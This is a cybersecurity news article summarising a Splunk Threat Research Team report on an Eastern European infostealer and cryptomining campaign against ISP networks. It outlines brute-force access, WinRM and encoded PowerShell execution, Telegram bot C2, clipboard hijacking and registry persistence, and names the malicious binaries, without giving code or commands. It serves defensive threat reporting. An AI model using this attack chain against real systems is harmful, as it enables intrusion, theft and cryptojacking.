Image: Splunk Threat Research Team
A new cybersecurity report from The Splunk Threat Research Team has uncovered a widespread infostealer and cryptomining campaign targeting Internet Service Provider (ISP) infrastructure on the West Coast of the United States and in China. The campaign, believed to originate from Eastern Europe, employs brute force attacks, credential abuse, data exfiltration, and cryptomining payloads to compromise ISP infrastructure.
The Splunk Threat Research Team observed that over 4,000 IP addresses belonging to ISP providers in the U.S. and China were specifically targeted. The attack is executed with minimal intrusion techniques, allowing threat actors to evade detection.
According to the report: “This mass exploitation campaign originates from Eastern Europe and uses simple tools that abuse victim’s computer processing power to install cryptomining payloads and binaries with diverse functions.”
Among the functions observed were:
- Brute force attacks on weak credentials for initial access
- Persistence mechanisms that disable remote access and security tools
- Deployment of additional crimeware
- Data exfiltration via Command and Control (C2) servers
- Ability to self-terminate to evade detection
The attackers relied on scripting languages like Python and PowerShell, which allowed them to operate in restricted environments. Additionally, Telegram API calls were used as a C2 communication channel.
Once access was obtained, the attackers dropped various binaries into a folder named Migration, which contained infostealer payloads and cryptominers. The key malicious files identified included:
- mig.rdp.exe – Used to facilitate further payload execution.
- Migrate.exe – Deployed various malware components.
- X64.exe – Responsible for launching additional scripts and malware payloads.
One of the most concerning aspects of the attack is its ability to perform automated data collection and clipboard hijacking to steal cryptocurrency wallet addresses. The malware also captures screenshots and transmits them to a Telegram bot C2 server: “The malware sends this data to its C2 server, which operates via a Telegram bot.”
The report highlights the abuse of Windows Remote Management (WINRM) services as a key attack vector: “Once the username and password was recovered, it will execute WINRM service to deploy the payload.”
WINRM execution allowed attackers to leverage encoded PowerShell scripts to disable security defenses and execute malware silently. Additionally, the Masscan tool was employed to scan large numbers of IP addresses for vulnerable systems.
The malware’s ultimate objective appears to be monetization through XMRig cryptomining operations, alongside data theft. Among the identified components was MicrosoftPrt.exe, a clipbanker malware used for stealing cryptocurrency wallet information. Other binaries, such as Superfetch.exe and ApplicationFrame.exe, were linked to mining operations.
To ensure persistence, the attackers manipulated Windows Registry Keys and modified file access permissions to prevent administrators from removing the malware.
Related Posts:
- Turkish’s ISPs has deployed special hardware to intercept Internet traffic and injected cryptocurrency mining scripts
- Mirai Botnet Unleashes Record-Breaking DDoS Attack, Cloudflare Thwarts Threat
